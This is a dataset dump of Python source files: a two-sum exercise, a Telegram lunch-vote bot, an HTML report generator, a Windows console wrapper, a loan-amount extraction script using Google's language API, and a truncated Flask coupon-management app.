+{"seq_id":"33009287932","text":"# Given an array of integers, find two numbers such that they add up to a specific target number.\n# The function twoSum should return indices of the two numbers such that they add up to the target,\n# where index1 must be less than index2. Please note that your returned answers (both index1 and index2)\n# are not zero­based.\n#\n# You may assume that each input would have exactly one solution.\n#\n# Input: numbers={2, 7, 11, 15}, target=9\n#\n# Output: index1=1, index2=2\n\n#Solution1:\n#Complexity n^2\n\ndef twoSum1(numbers, target):\n for index1, num1 in enumerate(numbers):\n for index2, num2 in enumerate(numbers[index1+1:]):\n\n if num1+num2 == target:\n #print(index1+1, index1+2+index2)\n print(f\"index1={index1+1}, index2={index1+2+index2}\")\n break\n\n\n#Solution2:\n#Complexity nlogn\n\n\ndef twoSum2(numbers, target):\n print(\"Blank\")\n\n\ndef main():\n numbers=[8,5,1,13]\n target=9\n twoSum1(numbers, target)\n twoSum2(numbers, target)\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"moitreebasu1990/Programming_exercises_2020","sub_path":"week1/src/week1_prob1.py","file_name":"week1_prob1.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"4522015700","text":"# -*- coding: utf-8 -*-\nimport config as cfg\nimport text_processing as tp\nimport mumu\nimport telebot\nimport time\nimport datetime\nimport database as db\nimport random\nimport event_timer as evt\nimport webhook\n\nrandom.seed(time.clock())\n\nbot = telebot.TeleBot(cfg.token)\n\n# week_day = datetime.datetime.today().weekday()\n\n# определяем дефолтное время\ncfg.dinner_time = cfg.dinner_default_time\ncfg.dinner_time = datetime.timedelta(hours=cfg.dinner_time[0], minutes=cfg.dinner_time[1])\ncfg.show_din_time = str(cfg.dinner_time)[:-3]\n\n# таймеры\n# evt.dinner_time_timer(bot)\nevt.one_hour_timer(bot)\nevt.check_metadata(bot)\n\n\n# приветствие\n@bot.message_handler(commands=['start', 'help'])\n@cfg.loglog(command='start/help', type='message')\ndef send_welcome(message):\n cid = message.chat.id\n bot.send_message(cid, cfg.hello_msg)\n\n\n# меню в муму\n@bot.message_handler(commands=['chto_v_mumu'])\n@cfg.loglog(command='chto_v_mumu', type='message')\ndef send_mumu(message):\n cid = message.chat.id\n week_day = datetime.datetime.today().weekday()\n lunches = mumu.lunches(week_day)\n\n bot.send_message(cid, lunches[0][0])\n bot.send_message(cid, lunches[0][1])\n bot.send_message(cid, lunches[1][0])\n bot.send_message(cid, lunches[1][1])\n\n\n# регистрируем человека в списке участников чата по его запросу\n@bot.message_handler(commands=['subscribe'])\n@cfg.loglog(command='subscribe', type='message')\ndef subscribe(message):\n cid = message.chat.id\n user = message.from_user\n res = db.insert_into_participants(cid, user)\n if res == -1:\n bot.send_message(cid, cfg.err_subscribe_msg)\n else:\n bot.send_message(cid, cfg.subscribe_msg)\n\n\n# удаляем человека из списка участников чата по его запросу\n@bot.message_handler(commands=['unsubscribe'])\n@cfg.loglog(command='unsubscribe', type='message')\ndef unsubscribe(message):\n cid = message.chat.id\n user_id = message.from_user.id\n db.delete_from_participants(cid, user_id)\n bot.send_message(cid, cfg.unsubscribe_msg)\n\n\n# регистрируем чат в рассылки на сообщения ботом\n@bot.message_handler(commands=['admin_subscribe_for_messages'])\n@cfg.loglog(command='admin_subscribe_for_messages', type='message')\ndef admin_subscribe_for_dinner(message):\n cid = message.chat.id\n res = db.insert_into_chatID(cid)\n if res == -1:\n bot.send_message(cid, cfg.err_subscribe_msg_chatId)\n else:\n bot.send_message(cid, cfg.subscribe_msg_chatId)\n\n\n# удаляем чат из рассылки на сообщения ботом\n@bot.message_handler(commands=['admin_unsubscribe_for_messages'])\n@cfg.loglog(command='admin_unsubscribe_for_messages', type='message')\ndef admin_unsubscribe_for_dinner(message):\n cid = message.chat.id\n db.delete_from_chatID(cid)\n bot.send_message(cid, cfg.unsubscribe_msg_chatId)\n\n\n# призвать всех\n@bot.message_handler(commands=['all'])\n@cfg.loglog(command='all', type='message')\ndef ping_all(message):\n cid = message.chat.id\n user_id = message.from_user.id\n users = db.sql_exec(db.sel_all_text, [cid])\n call_text = 'Эй, @all: '\n # бежим по всем юзерам в чате\n for i in users:\n # если юзер не тот, кто вызывал all, уведомляем его\n if i[1] != user_id:\n call_text = call_text + '@' + str(i[4]) + ' '\n\n # проверка на /all@ddsCrewBot\n if (message.text[0:15] == '/all@ddsCrewBot'):\n bot.send_message(cid, call_text.strip() + message.text[15:])\n else:\n bot.send_message(cid, call_text.strip() + message.text[4:])\n\n\n# подбросить монетку\n@bot.message_handler(commands=['coin'])\n@cfg.loglog(command='coin', type='message')\ndef throw_coin(message):\n cid = message.chat.id\n bot.send_message(cid, random.choice(cfg.precomand_text))\n time.sleep(1)\n\n bot.send_message(cid, random.choice(cfg.coin_var))\n\n\n# подбросить кубик\n@bot.message_handler(commands=['dice'])\n@cfg.loglog(command='dice', type='message')\ndef throw_dice(message):\n cid = message.chat.id\n bot.send_message(cid, random.choice(cfg.precomand_text))\n time.sleep(1)\n\n if len(message.text.split()) == 2 and message.text.split()[1].isdigit():\n bot.send_message(cid, random.randint(1, int(message.text.split()[1])))\n else:\n bot.send_message(cid, random.choice(cfg.dice_var))\n\n\n# магический шар\n@bot.message_handler(commands=['ball'])\n@cfg.loglog(command='ball', type='message')\ndef magic_ball(message):\n cid = message.chat.id\n bot.send_message(cid, random.choice(cfg.precomand_ball))\n time.sleep(1)\n\n bot.reply_to(message, random.choice(cfg.ball_var))\n\n\n# показать время обеда\n@bot.message_handler(commands=['dinner'])\n@cfg.loglog(command='dinner', type='message')\ndef show_dinner_time(message):\n cid = message.chat.id\n bot.send_message(cid, random.choice(cfg.dinner_text) + cfg.show_din_time)\n\n\n# показать/оставить штрафы\n@bot.message_handler(commands=['penalty'])\n@cfg.loglog(command='penalty', type='message')\ndef penalty(message):\n time_now = datetime.datetime.now()\n cid = message.chat.id\n pen = db.sql_exec(db.sel_all_penalty_time_text, [cid])\n\n cmd = message.text.split()\n flg = 0\n\n if (len(cmd) == 3) and (not cmd[1].isdigit()) and (cmd[2].isdigit()):\n for user in pen:\n if user[0] == cmd[1][1:]:\n flg = 1\n\n if user[2] == message.from_user.id:\n bot.send_message(cid, 'Нельзя ставить штрафы самому себе!')\n break\n\n penalty_time = abs(int(cmd[2]))\n if penalty_time != 0:\n if penalty_time >= 25:\n bot.send_message(cid, 'Я не ставлю штрафы больше чем на 25 минут!')\n else:\n bot.send_message(cid, 'Поставил штраф ' + str(cmd[1]) + ' ' +\n str(penalty_time) + ' мин')\n\n # добавляем строку штрафа в метаданные\n delta = datetime.timedelta(hours=24)\n expire_date = time_now + delta\n\n db.sql_exec(db.ins_operation_meta_text,\n [cfg.max_id_rk, 0, cid, user[2], penalty_time,\n str(time_now)[:-7], str(expire_date)[:-7], 1])\n cfg.max_id_rk += 1\n else:\n bot.send_message(cid, 'Я не ставлю штрафы 0 минут!')\n break\n\n if flg == 0:\n bot.send_message(cid, 'Я не нашёл ' + str(cmd[1]) + ' в базе...\\n' +\n 'Проверь написание ника!\\n' +\n 'Ну, или может быть этот этот человек ещё не подписался?')\n else:\n pen_msg = 'Штрафы на сегодня:\\n'\n pen_msg_flg = 0\n for user in pen:\n if int(user[1]) != 0:\n pen_msg += str(user[0]) + ' — ' + str(user[1]) + ' мин\\n'\n pen_msg_flg = 1\n\n if pen_msg_flg == 1:\n bot.send_message(cid, pen_msg)\n else:\n bot.send_message(cid, random.choice(cfg.penalty_empty_text))\n\n\n# раскомментировать, чтобы узнать file_id стикера\n# @bot.message_handler(content_types=[\"sticker\"])\n# def get_sticker(message):\n# print(message.sticker.file_id)\n# cid = message.chat.id\n# bot.send_sticker(cid, random.choice(cfg.sticker_var))\n\n\n@bot.message_handler(content_types=[\"text\"])\n@cfg.loglog(command='text_parser', type='message')\ndef text_parser(message):\n week_day = datetime.datetime.today().weekday()\n # нужно брать дату из даты сообщения\n hour_msg = time.localtime(message.date).tm_hour\n # текущее время, может пригодиться\n # hour_now = time.localtime().tm_hour\n cid = message.chat.id\n user_id = message.from_user.id\n\n if cid in cfg.subscribed_chats:\n # # лол кек ахахаха детектор\n if tp.lol_kek_detector(message.text) is True:\n print('##########', datetime.datetime.now(), 'lol_kek_detector')\n\n if random.random() >= 0.8:\n bot.send_sticker(cid, random.choice(cfg.sticker_var))\n print('Sent!')\n\n # # голосование за обед\n din_elec = tp.dinner_election(message.text)\n # ТОЛЬКО ДЛЯ ТЕСТИРОВАНИЯ!!!\n # if din_elec is not False:\n if week_day not in (5, 6) and hour_msg < 12 and din_elec is not False:\n print('##########', datetime.datetime.now(), 'dinner_election')\n\n print('Din_elec =', din_elec)\n user = db.sql_exec(db.sel_election_text, [cid, user_id])\n if len(user) == 0:\n bot.reply_to(message, cfg.err_vote_msg)\n else:\n penalty_time = int(user[0][3])\n\n final_elec_time = 0\n sign = 1\n\n if din_elec != 0:\n sign = (din_elec / abs(din_elec))\n final_elec_time = din_elec - sign * penalty_time\n\n if abs(final_elec_time) > 25:\n final_elec_time = sign * 25\n\n if (sign * final_elec_time < 0):\n final_elec_time = 0\n\n final_elec_time = datetime.timedelta(minutes=final_elec_time)\n cfg.dinner_time += final_elec_time\n\n additional_msg = ''\n if penalty_time != 0:\n additional_msg = 'с учётом штрафов '\n\n # голосование или переголосование\n if int(user[0][2]) == 0:\n bot.reply_to(message, cfg.vote_msg + additional_msg + str(cfg.dinner_time)[:-3])\n else:\n final_elec_time = 0\n prev_din_elec = int(user[0][2])\n sign = 1\n\n if prev_din_elec != 0:\n sign = (prev_din_elec / abs(prev_din_elec))\n final_elec_time = prev_din_elec - sign * penalty_time\n\n if abs(final_elec_time) > 25:\n final_elec_time = sign * 25\n\n if (sign * final_elec_time < 0):\n final_elec_time = 0\n\n final_elec_time = datetime.timedelta(minutes=final_elec_time)\n cfg.dinner_time -= final_elec_time\n bot.reply_to(message, cfg.revote_msg + additional_msg + str(cfg.dinner_time)[:-3])\n\n cfg.show_din_time = str(cfg.dinner_time)[:-3]\n print('Время обеда', cfg.show_din_time)\n db.sql_exec(db.upd_election_elec_text, [din_elec, cid, user_id])\n\n # # понеделбник - денб без мягкого знака\n if week_day == 0 and hour_msg < 12 and tp.soft_sign(message.text) is True:\n print('##########', datetime.datetime.now(), 'soft_sign')\n\n bot.reply_to(message, 'ШТРАФ')\n print('ШТРАФ')\n\n print('##########', datetime.datetime.now(), '\\n')\n\n\nprint('here')\nwebhook.webhook(bot)\nprint('here again')\n","repo_name":"causelovem/ddsCrewBot","sub_path":"last version/botProd.py","file_name":"botProd.py","file_ext":"py","file_size_in_byte":11684,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"73361533685","text":"from itertools import chain, repeat\nfrom datetime import datetime\nfrom functools import partial\n\n\ndef nested_report(data, table_bp, columns, HTMLise, depth=2):\n \"\"\"Assumes that all levels are nested dicts until a list of dicts\"\"\"\n if isinstance(data, list):\n yield table_bp\n for line in data:\n tds = [\"
  • \".format(el) for el in\n [HTMLise(line=line, col=col) for col in columns]]\n yield \"{}\".format(\"\".join(tds))\n yield \"
    {}
    \"\n else:\n for key, val in data.items():\n yield chain(\n [\"{}\".format(depth, key, depth)],\n chain.from_iterable(\n repeat(el, 1) if isinstance(el, str)\n else el for el in nested_report(\n val, table_bp, columns, HTMLise, depth + 1)))\n\n\ndef file_path_to_url(file_path, line_count, config):\n config_fpu = config.get(\"file_path_url\", {})\n if not config_fpu:\n return file_path\n base = config_fpu[\"base_url\"]\n branch = config_fpu.get(\"branch\", \"master\")\n num = line_count if config_fpu.get(\"add_line\", True) else 0\n file_path += '#L{}'.format(num)\n url_path = \"/\".join([base, branch, file_path])\n return \"{}\".format(url_path, file_path)\n\n\ndef HTMLise_func(config, line, col):\n if col == \"file_path\":\n prefix = len(line.get(\"base_path\", \"\"))\n return file_path_to_url(line[\"file_path\"][prefix:],\n line.get(\"line_count\", 0), config)\n return line[col]\n\n\ndef html_summary(config, data):\n config = config.get(__name__.split(\".\")[-1], {})\n title = config.get(\"title\", \"Pycrastinate HTML report\")\n columns = config.get(\"columns\",\n [\"token\", \"line_count\", \"file_path\", \"code\"])\n css_rules = \"\\n\".join(config.get(\"css\",\n [\"td{font-family: monospace; border=1}\"]))\n HTMLise = partial(HTMLise_func, config=config)\n css = ''.format(css_rules)\n html_start = [\"{}

    {}

    \".format(css, title)]\n if config.get(\"timestamp\", True):\n html_start.append(\"

    Generated at: {}

    \".format(datetime.now()))\n table_bp = \"{}\".format(\"\".join(\n (\"\".format(col) for col in columns)))\n report = chain([html_start],\n nested_report(data, table_bp, columns, HTMLise),\n [[\"\"]])\n return chain.from_iterable(repeat(el, 1) if isinstance(el, str)\n else el for el in report)\n","repo_name":"isaacbernat/pycrastinate","sub_path":"modules/html_summary.py","file_name":"html_summary.py","file_ext":"py","file_size_in_byte":2653,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"76"} +{"seq_id":"26538048942","text":"#!/usr/bin/env python3\n\nfrom typing import (\n Any as _Any,\n Callable as _Callable,\n)\n\nimport asyncio as _asyncio\nimport logging as _logging\nimport threading as _threading\n\nfrom asyncio.windows_events import (\n WindowsProactorEventLoopPolicy as _EventLoopPolicy,\n)\n\nfrom concurrent.futures import ThreadPoolExecutor as _Executor\n\nfrom ctypes import byref as _byref\n\nfrom ._console import _Console\n\nfrom ._win32api import (\n DWORD as _DWORD,\n\n Coord as _Coord,\n SMALL_RECT as _SMALL_RECT,\n\n CharInfo as _CharInfo,\n ConsoleScreenBufferInfo as _ConsoleScreenBufferInfo,\n SecurityAttributes as _SecurityAttributes,\n KeyEventRecord as _KeyEventRecord,\n InputRecord as _InputRecord,\n\n INVALID_HANDLE_VALUE as _INVALID_HANDLE_VALUE,\n\n CloseHandle as _CloseHandle,\n CreateFileW as _CreateFileW,\n\n FillConsoleOutputCharacterW as _FillConsoleOutputCharacterW,\n FlushConsoleInputBuffer as _FlushConsoleInputBuffer,\n GetConsoleMode as _GetConsoleMode,\n GetConsoleScreenBufferInfo as _GetConsoleScreenBufferInfo,\n ReadConsoleInputW as _ReadConsoleInputW,\n ScrollConsoleScreenBufferW as _ScrollConsoleScreenBufferW,\n SetConsoleCursorPosition as _SetConsoleCursorPosition,\n SetConsoleMode as _SetConsoleMode,\n WriteConsoleInputW as _WriteConsoleInputW,\n WriteConsoleOutputCharacterW as _WriteConsoleOutputCharacterW,\n)\n\nfrom .. import events as _events\n\n\n_log = _logging.getLogger(__name__)\n\n# noinspection PyTypeChecker\n_asyncio.set_event_loop_policy(_EventLoopPolicy())\n\n\nclass Win32Console(_Console):\n\n def __init__(self) -> None:\n\n self._range_height = 0\n self._fill_char = ' '\n\n self._executor = None\n\n self._output = None\n self._saved_output_mode = None\n self._buffer_info = _ConsoleScreenBufferInfo()\n\n self._input_handler = None\n self._input_future = None\n\n self._executor = _Executor(max_workers=1)\n\n input_ = _CreateFileW('CONIN$', 0xc0000000, 0x3,\n _byref(_SecurityAttributes(None, True)),\n 3, 0x80, None)\n\n self._output = _CreateFileW('CONOUT$', 0xc0000000, 0x3,\n _byref(_SecurityAttributes(None, True)),\n 3, 0x80, None)\n\n mode = _DWORD()\n _GetConsoleMode(self._output, _byref(mode))\n self._saved_output_mode = mode.value\n\n _SetConsoleMode(self._output, self._saved_output_mode | 0x0018)\n\n self._update_buffer_info()\n\n self._input_handler = _ConsoleInputHandler(input_, close=True)\n\n loop = _asyncio.get_event_loop()\n self._input_future = loop.run_in_executor(self._executor,\n self._input_handler.handle)\n\n def __del__(self) -> None:\n\n self.close(timeout=0)\n\n # noinspection PyBroadException\n def close(self, timeout: float = 0.1) -> None:\n\n input_future, self._input_future = self._input_future, None\n input_handler, self._input_handler = self._input_handler, None\n output, self._output = self._output, None\n executor, self._executor = self._executor, None\n self._buffer_info = None\n\n if input_future is not None:\n\n try:\n input_future.cancel()\n\n except Exception:\n _log.exception(\"unable to cancel input handler during cleanup\")\n\n if input_handler is not None:\n\n try:\n input_handler.shutdown()\n\n except Exception:\n _log.exception(\n \"unable to shutdown input handler during cleanup\"\n )\n\n if (self._saved_output_mode is not None and\n output is not None and output != _INVALID_HANDLE_VALUE.value):\n\n try:\n _SetConsoleMode(output, self._saved_output_mode)\n\n except Exception:\n _log.exception(\n \"unable to reset console output mode during cleanup\"\n )\n\n if executor is not None:\n\n try:\n executor.shutdown(wait=False)\n\n except Exception:\n _log.exception(\"unable to shutdown executor during cleanup\")\n\n def _update_buffer_info(self) -> None:\n\n _GetConsoleScreenBufferInfo(self._output, _byref(self._buffer_info))\n\n def print(self, s: str, flush: bool = False) -> None:\n\n print(s, flush=flush)\n\n def get_width(self) -> int:\n\n return self._buffer_info.dwSize.X\n\n def get_height(self) -> int:\n\n window = self._buffer_info.srWindow\n return window.Bottom - window.Top + 1\n\n def get_colors(self) -> int:\n\n return 16\n\n def request_size(self, height: int) -> int:\n\n if height < 0:\n raise ValueError(\"n cannot be negative\")\n\n max_y = self._buffer_info.dwSize.Y - 1\n max_height = min(max_y, max(self._buffer_info.srWindow.Bottom -\n self._buffer_info.srWindow.Top, 3))\n\n if height > max_height:\n height = max_height\n\n if height == self._range_height:\n return height\n\n max_x = self._buffer_info.dwSize.X - 1\n y = self._buffer_info.dwCursorPosition.Y\n\n missing_lines = (height - self._range_height) - (max_y - y)\n if missing_lines > 0:\n _ScrollConsoleScreenBufferW(\n self._output, _SMALL_RECT(0, 0, max_x, y - 1), None,\n _Coord(0, -missing_lines),\n _CharInfo(self._fill_char, self._buffer_info.wAttributes)\n )\n\n self._range_height += missing_lines\n if self._range_height == height:\n return height\n\n delta = height - self._range_height\n if delta < 0:\n y += delta\n\n scroll_region = _SMALL_RECT(0, y, max_x, max_y)\n _ScrollConsoleScreenBufferW(\n self._output, scroll_region, scroll_region,\n _Coord(0, y + delta),\n _CharInfo(self._fill_char, self._buffer_info.wAttributes)\n )\n\n self._range_height += delta\n self._buffer_info.dwCursorPosition.Y += delta\n\n _SetConsoleCursorPosition(self._output,\n self._buffer_info.dwCursorPosition)\n\n assert self._range_height == height\n return height\n\n def line_at(self, y: int, text: str, tail: int = 0) -> None:\n\n y += self._buffer_info.dwCursorPosition.Y - self._range_height\n n = len(text)\n\n written = _DWORD()\n _WriteConsoleOutputCharacterW(self._output, text, n, _Coord(0, y),\n _byref(written))\n\n if tail <= 0:\n return\n\n _FillConsoleOutputCharacterW(self._output, self._fill_char, tail,\n _Coord(n, y), _byref(written))\n\n def register_input_callback(self, callback: _Callable) -> _Any:\n\n return self._input_handler.register_callback(callback)\n\n def unregister_input_callback(self, token: _Any) -> None:\n\n self._input_handler.unregister_callback(token)\n\n\nclass _ConsoleInputHandler:\n\n def __init__(self, handle, close=False) -> None:\n\n self._handle = handle\n self._close = close\n self._saved_mode = None\n self._callback = None\n self._callback_lock = None\n self._shutdown_signal = None\n\n mode = _DWORD()\n _GetConsoleMode(self._handle, _byref(mode))\n self._saved_mode = mode.value\n\n _SetConsoleMode(self._handle, self._saved_mode & ~0x0007 | 0x0018)\n\n self._callback_lock = _threading.Lock()\n self._shutdown_signal = _threading.Event()\n\n # noinspection PyBroadException\n def __del__(self) -> None:\n\n handle, self._handle = self._handle, None\n saved_mode, self._saved_mode = self._saved_mode, None\n\n if handle is not None and handle != _INVALID_HANDLE_VALUE.value:\n\n try:\n _FlushConsoleInputBuffer(handle)\n\n except Exception:\n _log.exception(\n \"unable to flush console input buffer during cleanup\"\n )\n\n if saved_mode is not None:\n\n try:\n _SetConsoleMode(handle, saved_mode)\n\n except Exception:\n _log.exception(\n \"unable to reset console input mode during cleanup\"\n )\n\n if self._close:\n\n try:\n _CloseHandle(handle)\n\n except Exception:\n _log.exception(\n \"unable to close console input handle during cleanup\"\n )\n\n def shutdown(self) -> None:\n\n self._shutdown_signal.set()\n\n input_record = _InputRecord(EventType=0x1, KeyEvent=_KeyEventRecord(\n wVirtualKeyCode=0xff,\n wVirtualScanCode=0xffff,\n ))\n written = _DWORD()\n _WriteConsoleInputW(self._handle, input_record, 1, _byref(written))\n\n def handle(self) -> None:\n\n # noinspection PyTypeChecker,PyCallingNonCallable\n buffer = (_InputRecord * 100)()\n read = _DWORD()\n\n while not self._shutdown_signal.is_set():\n\n _ReadConsoleInputW(self._handle, buffer, len(buffer), _byref(read))\n\n if self._shutdown_signal.is_set():\n break\n\n for input_record in buffer[:read.value]:\n\n if input_record.EventType != 0x0001:\n continue\n\n key_event = input_record.KeyEvent\n if not key_event.bKeyDown:\n continue\n\n vk = key_event.wVirtualKeyCode\n if vk == 0x1b:\n event = _events.QuitEvent()\n\n elif vk == 0x26:\n event = _events.UpNavEvent()\n\n elif vk == 0x28:\n event = _events.DownNavEvent()\n\n else:\n continue\n\n with self._callback_lock:\n if self._callback is None:\n continue\n\n loop, callback = self._callback\n\n loop.call_soon_threadsafe(callback, event)\n\n def register_callback(self, callback: _Callable) -> _Any:\n\n pair = _asyncio.get_running_loop(), callback\n\n with self._callback_lock:\n\n if self._callback is not None:\n raise NotImplementedError(\"cannot register multiple callbacks\")\n\n self._callback = pair\n\n return hash(pair)\n\n def unregister_callback(self, token: _Any) -> None:\n\n with self._callback_lock:\n\n if self._callback is None:\n raise ValueError(\"no callback has been registered\")\n\n if hash(self._callback) != token:\n raise ValueError(\"token mismatch\")\n\n self._callback = None\n","repo_name":"blubberdiblub/ezconsole","sub_path":"ezconsole/abstract/win32.py","file_name":"win32.py","file_ext":"py","file_size_in_byte":10931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"23307533790","text":"import os\nimport io\nfrom pathlib import Path\nimport pandas as pd\nimport glob\nimport pickle\nimport pycountry\nimport time\nfrom google.cloud import language_v1\nfrom text2int import text2int\n\n\n\n#os.environ['GOOGLE_APPLICATION_CREDENTIALS'] = r'flash-surge-313319-fb0596b2676b.json'\nclient = language_v1.LanguageServiceClient()\n\ndf = pd.read_pickle(\"sections.pkl\")\n\ndef get_price(text_content):\n \"\"\"\n Analyzing Entities in a String\n\n Args:\n text_content The text content to analyze\n \"\"\"\n\n \n if not text_content or '2.02' not in text_content:\n return None\n else:\n text_content = text_content[:text_content.find('2.02')-3]\n \n # text_content = 'California is a state.'\n\n # Available types: PLAIN_TEXT, HTML\n type_ = language_v1.Document.Type.PLAIN_TEXT\n\n # Optional. If not specified, the language is automatically detected.\n # For list of supported languages:\n # https://cloud.google.com/natural-language/docs/languages\n language = \"en\"\n document = {\"content\": text_content, \"type_\": type_, \"language\": language}\n\n # Available values: NONE, UTF8, UTF16, UTF32\n encoding_type = language_v1.EncodingType.UTF8\n\n response = client.analyze_entities(request = {'document': document, 'encoding_type': encoding_type})\n\n # Loop through entitites returned from the API\n ans = []\n for entity in response.entities:\n if language_v1.Entity.Type(entity.type_).name == 'PRICE':\n# return entity.name\n ans.append(entity.name)\n# print(entity.name, language_v1.Entity.Type(entity.type_).name)\n time.sleep(0.25)\n return ans\n\ndf['Amount_G'] = df['ARTICLE II'].apply(get_price)\n\ndef get_amount(x):\n if not x:\n return None\n if len(x) == 1:\n return x[0]\n elif len(x) == 2:\n return x[1]\n elif len(x) == 4:\n # loan has two parts\n return [x[1], x[3]]\n else:\n # loan has\n return x[1]\n\ndf['Amount_G_num'] = df['Amount_G'].apply(get_amount)\n\ndef get_amount(x):\n curr = ''\n num = '0'\n if x:\n for i, s in enumerate(x):\n if not s.isdigit():\n curr += s\n else:\n num = x[i:]\n break\n return pd.Series([curr.strip(), num], index=['currency', 'Amount'])\n\ndf[['currency', 'Amount']] = df['Amount_G_num'].apply(get_amount)\n\ndef get_first_amount(x):\n amt = ''\n curr = ''\n if x:\n res = text2int(x[0].lower()).strip()\n if res[0].isdigit():\n for i,s in enumerate(res):\n if s.isdigit():\n amt += s\n else:\n curr = res[i:].strip()\n break\n else:\n for i,s in enumerate(res):\n if not s.isdigit():\n curr += s\n else:\n amt = res[i:].strip()\n break\n return pd.Series([curr, amt], index=['currency1', 'Amount1'])\ndf[['currency1', 'Amount1']] = df['Amount_G'].apply(get_first_amount)\n\ndef standard_curr(x):\n if 'dollar' in x or 'usd' in x or '$' in x:\n return 'us dollar'\n if 'japan' in x:\n return 'yen'\n if 'eur' in x:\n return 'euro'\n return x.strip()\ndf['currency_standard'] = df['currency1'].apply(standard_curr)\n\ndef standard_amt(x):\n if not x:\n return None\n else:\n return int(x.replace(',',''))\ndf['amount_standard'] = df['Amount1'].apply(standard_amt)\n\ndf.to_pickle(\"world_bank_amounts.pickle\")\n\n\n","repo_name":"xushuo0/Qarik-Project","sub_path":"extraction_pipeline/extract_loan_amounts.py","file_name":"extract_loan_amounts.py","file_ext":"py","file_size_in_byte":3502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"18298632881","text":"from flask import Flask, request, redirect, url_for, render_template, flash, session, request, abort\nfrom flask_login import LoginManager, login_user, logout_user, current_user, login_required\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_login import UserMixin\nimport os\nfrom db import *\nfrom models import User, Student\nfrom views import *\nfrom forms import *\nimport json\nimport utils\n\n\n# 初始化 Flask App 设置静态路径访问路径为\napp = Flask(__name__, static_url_path='')\n\n\n\n# 配置数据库连接\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///db/pkd.sqlite3'\ninit_db(app) # 初始化数据库\n\n# login 密钥\napp.config['SECRET_KEY'] = os.urandom(24)\n\n# 登陆管理器配置\nlogin_manager = LoginManager()\nlogin_manager.login_view = 'login' # 若用户未登录,则自动跳转到指定页面,而不是提示\nlogin_manager.login_message_category = 'info' # 自定义消息分类\nlogin_manager.login_message = '请登录。' # 自定义消息\nlogin_manager.init_app(app)\n\n\n@login_manager.user_loader\ndef load_user(user_id):\n if(isAdmin(session)):\n return User.query.get(int(user_id))\n else:\n return Student.query.get(int(user_id))\n\n# 模板全局变量 设置站点名称为PKD\n@app.context_processor\ndef inject_stage_and_region():\n return dict(siteName=\"PKD\")\n\n\n\n# 主页路由\n@app.route('/')\n@app.route('/index')\n@login_required\ndef index():\n # 判断用户类型\n if(isAdmin(session)):\n username = query_UserById(current_user.get_id()).username\n else:\n return redirect(url_for('coupon'))\n data = {\n \"title\": \"学生信息管理\",\n \"username\": username,\n \"fields\": query_Students_FieldsNotPwd(),\n \"students\": query_Students(),\n \"user_type\": session.get(\"user_type\")\n }\n return render_template('index.html', data=data)\n\n\n\n@app.route('/login', methods=['GET'])\ndef login():\n # 处理一个非预期的情况:假设用户已经登录,却导航到/login URL。需要导航到/index URL\n if current_user.is_authenticated:\n return redirect(url_for('index'))\n return render_template('login.html')\n # username = request.form.get('username')\n # password = request.form.get('password')\n # remember = True if request.form.get('remember') else False\n # if request.method == 'POST':\n # user = query_User(username)\n # if user is None or not user.check_password(password):\n # flash('账号或用户名错误!')\n # return redirect(url_for('login'))\n\n # login_user(user, remember=remember)\n # return redirect(url_for('index'))\n\n # # GET 请求\n # return render_template('login.html')\n\n# 弃用\n@app.route('/charts')\n@login_required\ndef charts():\n return render_template('charts.html')\n\n# 优惠券路由\n@app.route('/coupon')\n@login_required\ndef coupon():\n username = None\n if(isAdmin(session)):\n username = query_UserById(current_user.get_id()).username\n else:\n username = query_StudentById(current_user.get_id()).name\n data = {\n \"title\": \"优惠券\",\n \"username\": username,\n \"user_type\": session.get('user_type')\n }\n return render_template('coupon.html', data=data)\n\n# 删除/清空优惠券\n@app.route('/ajax/coupon/del', methods=['GET', 'POST'])\n@login_required\ndef coupon_del_ajax():\n jsonData = \"\"\n if request.method == 'POST':\n coupons = request.form.getlist('couponID') # 获取优惠券 couponID\n for coupon in coupons:\n del_KeyById(coupon) # 删除指定优惠券\n jsonData = json.dumps({\n \"status\": 200,\n \"msg\": f\"删除全部优惠券成功。\",\n \"data\": coupons\n })\n\n elif request.method == 'GET':\n del_KeyAll() # 删除全部优惠券\n jsonData = json.dumps({\n \"status\": 200,\n \"msg\": f\"删除全部优惠券成功。\"\n })\n return jsonData, 200\n\n\n# 添加优惠券\n@app.route('/ajax/coupon/add')\n@login_required\ndef coupon_add_ajax():\n args = request.args\n total = args.get(\"total\", type=int, default=10) # 获取要添加优惠券的总数\n if(total <= 0):\n return json.dumps({\n \"status\": 400,\n \"msg\": f\"添加失败,提交参���错误。\"\n }), 400\n keyset = generate_keys(total) # 生成 n 张优惠券\n count = keySet2DB(keyset) # 生成的优惠券加入数据库\n return json.dumps({\n \"status\": 200,\n \"msg\": f\"添加成功,共添加 {count} 张优惠券。\"\n }), 200\n\n# 获取优惠券数据\n@app.route('/ajax/coupon/data')\n@login_required\ndef coupon_data_ajax():\n keys = query_Keys()\n fields = query_Keys_Fields() # 获取 Key 全部字段\n keysList = query2List(fields, keys) # 对象转列表\n return json.dumps({\n \"status\": 200,\n \"msg\": \"优惠券获取成功。\",\n \"data\": keysList,\n \"fields\": fields\n }, indent=4, sort_keys=True, default=str), 200\n\n# 检查优惠券是否有效\n@app.route('/ajax/coupon/check', methods=['POST'])\ndef coupon_check_ajax():\n code = request.form.get('code', type=str)\n\n # 如果优惠券存在且有效\n if(keyIsExist(code) and keyIsUseful(code)):\n set_key_status(code, True) # 设置优惠券已使用\n return json.dumps({\n \"status\": 200,\n \"msg\": \"优惠券可用。\",\n \"status\": True\n }), 200\n else:\n return json.dumps({\n \"status\": 200,\n \"msg\": \"优惠券不可用。\",\n \"status\": False\n }), 200\n\n# ajax 登录\n@app.route('/ajax/login', methods=['GET', 'POST'])\ndef login_ajax():\n\n errorPWD = json.dumps({\"status\": 400, \"msg\": \"账号或用户名错误!\"})\n\n # 处理一个非预期的情况:假设用户已经登录,却导航到/login URL。需要导航到/index 